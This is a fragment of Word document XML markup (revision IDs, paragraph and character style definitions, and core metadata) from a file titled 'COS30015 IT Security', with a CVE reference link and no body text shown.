    <w:rsid w:val="00C021FB"/>
    <w:rsid w:val="00C40E9D"/>
    <w:rsid w:val="00C74EA1"/>
    <w:rsid w:val="00CE6721"/>
    <w:rsid w:val="00D333BF"/>
    <w:rsid w:val="00D42430"/>
    <w:rsid w:val="00DA6B60"/>
    <w:rsid w:val="00DF5BE3"/>
    <w:rsid w:val="00E24C8B"/>
    <w:rsid w:val="00E87FE8"/>
    <w:rsid w:val="00EC7B38"/>
    <w:rsid w:val="00F53E86"/>
    <w:rsid w:val="00FB3405"/>
    <w:rsid w:val="00FC1416"/>
    <w:rsid w:val="00F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0BCEAC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0C4D78AB-3CCD-4A2E-9C5E-836E655E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85268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3E8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5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53E86"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a6">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a7"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00F5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rsid w:val="00F53E86"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a9"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00DA6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A6B6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sid w:val="00477EF2"/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="page number"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00852683"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="30">
    <w:name w:val="标题 3 字符"/>
    <w:basedOn w:val="a0"/>
    <w:link w:val="3"/>
    <w:rsid w:val="00852683"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="26"/>
      <w:szCs w:val="2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5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8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52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0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0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1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7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0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2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7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53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9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1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13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07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3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2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3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9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9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62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95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1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43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47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88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1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3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3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18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vedetails.com/cve/cve-2003-0201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vedetails.com/cve/cve-2003-0201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COS30015 IT Security</dc:title>
  <dc:subject/>
  <dc:creator>James Hamlyn-Harris</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>GUANJUN LIN</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <cp:lastPrinted>2016-10-25T06:27:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-07-21T05:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-08-16T00:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>